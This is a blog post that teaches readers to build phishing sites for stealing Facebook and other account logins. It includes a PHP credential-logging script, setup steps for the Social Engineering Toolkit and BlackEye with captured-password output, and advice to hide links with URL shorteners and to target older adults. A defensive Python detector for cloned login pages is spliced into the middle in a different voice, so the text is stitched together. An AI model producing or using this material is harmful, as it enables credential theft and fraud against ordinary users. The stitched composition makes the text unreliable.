Sunday, August 30, 2020

How to Create a Phishing Website 2020 {PC & Phone Setup}

Howdy, hustler? There is this disturbing hustler in my list requesting for how to create a phishing website. I can’t conceal the secret anymore because a phishing webpage is an essential tool for any online hustle. One of the first stages of becoming a hacker is to learn to phish.

Hiring a web developer to design a phishing website is a BIG mistake to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In short, it compromises the money you should bill the clients using your phishing website.

Fortunately, you will learn how to create a phishing site with or without programming skills. Yes, there is no mistake in what you just read. You’ll further learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to make a phishing site on Android.

What to Consider before you Create a Phishing Website

There are several methods regarding how to create a phishing website for billing. Nevertheless, I welcome the pain to teach you as many methods for creating a phishing website that works. This lesson is also important if you also want to learn to hack a Facebook account
The lessons will mainly cover:
  • how to make a phishing site with 000webhost
  • how to make a phishing webpage in Kali Linux
  • how to create a phishing site using Android
Where necessary, I will indicate how to make a phishing site on Android and other mobile operating systems. Understand that it is not every method for creating a phishing website that you will learn can be possible with a mobile phone. I will advise that you skip methods that require a PC if you have either Android, iOS, Windows, HarmonyOS, etc.

Note: I recommend Android over any other OS.

Platforms for Creating Webpage for Phishing

The two platforms we will use are:
For easy understanding, I will indicate when a method is possible with a phone. If it applies to PC only, I will also indicate for you.
So, how can I create a phishing website that works?
How to Create a Phishing Website

  • Method 1: How to Make a Phishing Site with 000webhost
  • Method 2: How to Make a Phishing Webpage in Kali Linux
  • Method 3: how to create a phishing site using Android
  • Method 4: Create a Phishing Website Using Super Phisher

Method 1: How to Make a Phishing Site with 000webhost

Regarding how to create a phishing website, 000webhost is one of the prestigious methods. This method also regards how to make a phishing site using notepad. It requires a PC for the best experience. Nonetheless, you can use an Android phone, but it must have at least 3 gigabytes of RAM storage.

Identify the Target Website and Download the HTML Index

For this guide, we are creating a phishing website out of www.facebook.com.
For Android
  • Download Naked Browser LTS from Google Play Store
  • Visit facebook.com
  • Swipe your screen to the right.
  • Click View Page Source.
You should now see the source code of facebook.com. Nobody knows that source code is viewable with a mobile phone. So, try to keep my secret a secret.
For PC
  • Install Firefox or Chrome
  • Visit Facebook.com.
  • Right-click and select View Source. In some browsers like Firefox, you will see View Source Element.
Your browser will split-display, and what you find on the right or left side of your screen is the HTML source code of the Facebook webpage. If you are using the Naked Browser LTS for Android, the source code will open in a new tab.

Copy the HTML Source Code

You now have to select and copy the entire text. This method is purely how to make a phishing site using notepad because it requires either the notepad or WordPad application to be successful.
For Android
  • Download FX file manager.
  • Launch the app and Media Card.
  • Click the options button at the top-right screen.
  • Click File.
  • Click Text.
  • Name the file as index.html.
  • Paste the Facebook HTML source code.
You now have to use someone’s PC and convert the index.html file to Unicode using Windows Explorer. Simply click on Save As and set the encoding to Unicode.
For PC
  • Install a Notepad (recommended) or WordPad.
  • Launch the Notepad and paste the HTML source code.
  • Click Save As.
  • Name the file as index.html.
  • Set Save as type as All Files and set Encoding as Unicode.

Create the Password PHP File

This stage is the main deal regarding how to create a phishing page of any website. It is where every Facebook client login password will go for phishing to be successful. Since you have no programming knowledge, copy the code below.
<?php
header (‘Location: facebook.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
Now, paste this code in your Notepad (PC user) or create a new .txt file using Android (mobile users). Use post.php as the file name and select Unicode for the encoding format.

Merge the PHP File with the HTML Source Code File

Concerning how to create a phishing web, if we do not integrate the PHP file in the HTML file, phishing won’t work. If you are using an Android phone, download PC Keyboard from
What do we do? Below are the steps to integrate the PHP keyword picker in the HTML.
  • Launch the HTML file with your browser.
  • Click Ctrl F.
  • Input “=action” in the provided space.
  • You should see an underlined part of the codes. Select and replace the portion with “post.php”.
If you are creating a phishing website from a site other than Facebook, the method will not be the same. However, you can access the login of that site by doing the following:
  • Open the website.
  • Click Login.
  • Right-click and view page source. You should find something similar to what we have for Facebook in this article (=action).

Host the PHP File Online with 000webhost

In case you are wondering what the “hosting” means, it is simply the act of making the phishing website available online. Without hosting the PHP file, clients will be unable to access the website, and you will not phish passwords. Do the following to host the files on 000webhost.
  • Visit 000.webhost.com.
  • Sign up for free and confirm your email address.
  • Click Upload Files Now.
  • Select the Public_html folder and click the upload icon in the toolbar.
  • Click Select Files and select the PHP file.
  • Hit Upload, and your files will upload to the servers.
Note: I have tested the free hosting from 000webhost, and it is quite slow with several downtimes.
You have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and copy down your web address.

Host the Phishing Page

Regarding how to make a fake website for phishing, it is time to host the phishing webpage. Below are the proper steps towards hosting the phishing page as someone without programming skills.
Note: If you uploaded to the root folder of your web host directory, add http:// just in front of the site.

If you are not sure whether you added, you can test by navigating to http://yourwebsiteforyourpostphpupload/post.php. If it redirects to the website you are phishing, you are good to go. In the case of this article, it will redirect us to www.facebook.com. If there are issues, confirm whether you uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in www.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The action will automatically generate a link for the phishing website you are creating.

Test the Website

Visit the phishing website you just created and try to login with any Facebook login detail. When you click login, it should redirect you to www.facebook.com. If there is no redirection, there is a problem. After all, the principle regarding how to create a phishing page step by step is that you remain attentive per step.

If it logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we have the post.php file. Open the Log.txt file and you should find the Facebook login details you attempted in frontend (the user-accessible login page).

 Guess what? Your phishing website is ready with the help of 000webhost! Share the link with targets you want to phish. You can also do Facebook phishing to hack a Facebook account successfully.

Method 2: How to Make a Phishing Webpage in Kali Linux

This method concerns how to make a phishing webpage in Kali Linux. Unfortunately, mobile users will be unable to create a phishing webpage using this method. The reason is that Kali Linux will not run on mobile. Even if there is a way to run the Kali Linux on mobile, the experience will not be good. So, let’s see how to create a phishing webpage combining Kali Linux and the credential harvester.
#Requirements
  • Kali Linux
  • Social Engineering Toolkit (preinstall in Kali Linux)
  • Target phishing website URL.
For this guide regarding how to create a phishing website, we will create a phishing page for www.facebook.com. The process is the same notwithstanding the website you prefer to use for the phishing creation.

Launch the Terminal in Kali

First, open the terminal window in Kali and be sure to have root access. If you are a non-root user, type sudo root and enter your password. From the Application options, click the dropdown and select Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit.


If you are a root user, simply type setoolkit in the command line. A warning message will appear informing you that this tool is to be used with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purpose. Well, since you will be using it for a malicious purpose, you are already violating the terms of service.
Anyway, type “Y” to agree to the terms and conditions of using the tool. Y stands for yes.

Social Engineering Attack

Still, on how to create a phishing page step by step, it’s time to play around with the Social Engineering Toolkit. Bear in mind that the essence of this method is to capture user logins and the Social Engineering Toolkit is the password harvester. Let’s proceed!
A menu will come up after you insert the “Y” command. Do the following:
  • Input 1.
  • Input 3 to select Credential Harvester Attack Method.
At this point, you are presented with options to either clone a page for phishing or create a malicious phishing page. For this guide on how to create a simple phishing page, we will select the cloning option for facebook.com.
  • Input 2 to select Site Cloner.
Note: You have to be patient because it will take time for the Social Engineering Toolkit to clone Facebook. It might take even longer for weak PCs.

Set IP Address for Password Harvesting

Open a new terminal and type in ifconfig. Look for ‘inet’ and copy the IP address you find there. Social Engineering Toolkit will request for the IP address to store the credentials it will capture. Simply paste the IP address you copied in the recent terminal.

Input Your Phishing Website

Enter the site you want to use for creating a phishing page. Note that we use facebook.com in this step by step guide for creating a phishing website. Social Engineering Toolkit will request for Apache Server to run while phished data is written to Apache root directory. Input “Y” to allow and the phishing setup for facebook.com is complete.


Facebook.com is now hosted, and your phishing page is active. So, you can now share with the targets you want to phish. But then, there is a little problem. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You require a link shortening service to conceal the malicious login link before sending out to phishing targets. Some of the link shortening service providers are:
  • ly
  • ly
  • ClickMeter
  • TinyURL
  • Rebrandly
  • T2M
  • gl
Copy your IP address as http://yourIPaddress and paste in any of the link shortening services. It should look like http://72.229.28.185. Click shorten URL and the IP link will change to a unique URL that will redirect credentials to you.

Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new mode of accessing Facebook or the phishing site that you use for free.


Finally, locate the login details by clicking Home > Root > Var > WWW. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.
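Seen from the defender's side, the two traits described in Methods 1 and 2, a copied login page whose form action now points at a local script and a link that resolves to a bare http://IP address, are what a mail gateway, crawler or SOC analyst can test for. The check below is an added example, not code from the original post or from any tool it names. The function names, the constructed sample page and the documentation-range address are assumptions, as is the premise that the copied markup still carries the original site's canonical or og:url tag.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LoginPageScan(HTMLParser):
    """Collect where password forms submit and which origin the markup claims."""

    def __init__(self):
        super().__init__()
        self.open_form_action = None   # action of the <form> currently open
        self.password_actions = []     # actions of forms that hold a password field
        self.claimed_urls = []         # canonical / og:url values left in the markup

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.open_form_action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self.open_form_action is not None:
                self.password_actions.append(self.open_form_action)
        elif tag == "link" and (a.get("rel") or "").lower() == "canonical":
            self.claimed_urls.append(a.get("href") or "")
        elif tag == "meta" and a.get("property") == "og:url":
            self.claimed_urls.append(a.get("content") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self.open_form_action = None


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_login_page(page_url, html):
    """Return findings for a page fetched from page_url; empty list means none."""
    scan = LoginPageScan()
    scan.feed(html)
    if not scan.password_actions:
        return []
    served = urlparse(page_url)
    host = served.hostname or ""
    findings = []
    if served.scheme != "https":
        findings.append("password form served without TLS")
    if is_ip_literal(host):
        findings.append("password form served from a bare IP address")
    # Exact host comparison; production code would compare registrable domains.
    claimed = {urlparse(u).hostname for u in scan.claimed_urls} - {None, host}
    for c in sorted(claimed):
        findings.append(f"markup claims {c} but was served from {host}")
        for action in scan.password_actions:
            target = urlparse(urljoin(page_url, action)).hostname
            if target != c:
                findings.append(f"credentials post to {target}, not {c}")
    return findings


# Constructed sample input: a copied login page with the form action rewritten.
SAMPLE_URL = "http://203.0.113.10/index.html"  # documentation-range address
SAMPLE_CLONE = """<html><head><link rel="canonical" href="https://www.facebook.com/">
</head><body><form action="post.php" method="post">
<input type="text" name="email"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    for finding in assess_login_page(SAMPLE_URL, SAMPLE_CLONE):
        print(finding)
```

A page served from the origin its own markup names produces no findings, so the check can run against every URL that carries a password field.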

Method 3: How to Create a Phishing Website with Your Phone

This method is a special method from me to you because I’m aware that about 50% of hustlers have no PC. It requires your phone and BlackEye application. The BlackEye app I have supports phishing on 32 websites. Some of the websites include GitHub, Protonmail, Facebook, Shopify, Twitter, PayPal, Google, Gitlab, Adobe, MySpace, Pinterest, Verizon, etc.


Normally, BlackEye is most functional using Kali Linux concerning how to create a phishing page of any website. However, we can install the relevant commands on an Ubuntu or Debian device. Simply update the Kali distro, and you install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.

Download BlackEye

Before downloading BlackEye, clone the source from the GitHub repository. How do you clone the source correctly?
Open a terminal window and input the command codes below.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into ‘blackeye’…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command above will install and activate the BlackEye repository. Go to the blackeye folder and run the bash blackeye.sh command. Below is what you should see:


~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not    ::     :: responsible for any misuse or damage caused by BlackEye.  ::     :: Only use for educational purporses!!                      ::      :: Attacking targets without mutual consent is illegal!      :: [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART

Modify Facebook.com Page

Right-click and click on the “View Page source”
Facebook.com will show an expired copyright notice. If you do not like that, return to the blackeye folder from the bash script and type Is. Typing Is will display the sites folder in the BlackEye repository.


~/blackeye$ ls blackeye.sh  LICENSE  README.md  sites
With the cd sites command, you can still navigate to the sites folder and then reveal the sites by entering Is command. You can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.


~/blackeye$ cd sites~/blackeye/sites$ ls adobe   cryptocurrency  facebook  google          linkedin   myspace  paypal      shopify   spotify  twitter  wordpressbadoo   devianart       github    instafollowers  messenger  netflix  pinterest   shopping  steam    verizon  yahoocreate  dropbox         gitlab    instagram       microsoft  origin   protonmail  snapchat  twitch   vk       yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:


~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files  index.php  ip.php  ip.txt  login.html  login.php  saved.ip.txt  saved.usernames.txt
Now, edit the HTML source code of facebook.com using any text editor from the app store. Simply open login.html, and you should find the source code for the Facebook login page.

Build the Facebook.com Phishing Page

Do the following:
  • Open a new terminal window.
  • Navigate to the blackeye folder.
  • Run bash blackeye.sh.
  • Return to the selection menu of the phishing page where you have a list of phishing websites.
  • As you can see in the source code below, Facebook is number 2, so you have to select 02 and press enter.
~/blackeye/sites/protonmail$ cd~$ cd blackeye~/blackeye$ bash blackeye.sh [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART [*] Choose an option: 18

After selecting Facebook as a phishing website, the terminal will request an IP address. Input your IP address, press enter, and you will see something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can now navigate to facebook.com for the result of your phishing setup.

Capture the Password on Facebook

Now, you can share the link to targets and convince them to use the link.
[*] Waiting victim open the link … [*] IP Found![*] Victim IP: 72.229.28.185[*] User-Agent:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0[*] Saved: shopping/saved.ip.txt
The moment your target uses the link to login to facebook.com, BlackEye reports the username, as you can see below.
[*] Waiting credentials … [*] Credentials Found![*] Account: smartlazyhustler[*] Password:  thesmartlazyhustler1997[*] Saved: sites/shopping/saved.usernames.txt
The only downside with this method is that it will not work if the target uses 2FA security on his/her account.

Method 4: Create a Phishing Website Using Super Phisher

Super Phisher is a simple tool that phishers do not use very often. It is a straightforward tool to use, and I’ll quickly highlight things to do to create a unique phishing site.
#Requirements
Note: We are using facebook.com for the sake of this phishing website guide.

Download and Extract Super Phisher

I can’t include the download link here for obvious reasons. After downloading the Super Phisher, extract the files and launch Super Phisher.

Complete the Super Phisher Form

Enter https://www.facebook.com in the URL of Login Page section.
For Name of Log File, you can input any name (name.txt) that you will remember (it is where the logins will be saved).
Use the PHP file name for the Name of PHP File section.
Enter https://www.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher will generate two output files in the output folder.

Create a Webhosting Account

You need to host the files with web hosts that support FTP. I recommend hosting services like t35.com and byethost.com. You can also search for free host services if you don’t want to spend it. Also, note that free hosting makes your phishing website slow and unstable.
Note: If you do not know how to create a web hosting account, you can send me a request email for a hosting account.

Host the Phishing Files

Go to Super Phisher and upload the two files you find there to your webhost. Make sure to upload both files to public_html.
From there, you can look for your phishing page URL. If you can’t find the URL, copy the source code in HTML file and paste in www.htmlpasta.com. Complete the reCAPTCHA challenge, and you will see your URL.
Share the phishing link with people you want to phish. Once they use the link to login to Facebook, their login details will be saved to your web account. Navigate to Log.txt file in your hosting account and retrieve the Facebook login details.

Top 10 Websites to Use for Phishing

  • Netflix
  • Chase
  • Yahoo
  • Facebook
  • PayPal
  • Apple
  • Microsoft
  • Amazon
  • eBay
  • WhatsApp
NOTE
I do not include download links in my articles for obvious reasons.

Conclusion

So, here is all regarding how to create a phishing page step by step. The exciting thing is that I have painstakingly explained this guide for those without any programming skills. I bet you can’t find any better guide out there unless you wish to spend your data.


If you find it difficult to follow up, then hire a web developer to do the job. But like I mentioned earlier, it is unsafe to hire a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that’s a story for another day.
Phish Safely…